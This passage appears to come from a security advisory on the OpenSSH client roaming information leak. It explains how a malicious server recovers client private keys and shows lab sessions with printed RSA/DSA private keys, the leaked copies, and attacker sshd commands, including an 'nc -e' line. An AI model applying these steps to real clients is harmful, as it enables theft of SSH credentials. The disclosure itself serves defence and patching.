Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme
Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key
$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013
$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:768" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-9448bb7f/infoleak
MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...
env ROAMING="client_out_buf_size:1024" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-279f5e2b/infoleak
... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...
Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013
$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:2048" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-35ee7ab0/infoleak
MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-6cb31d82/infoleak
... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=
Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt 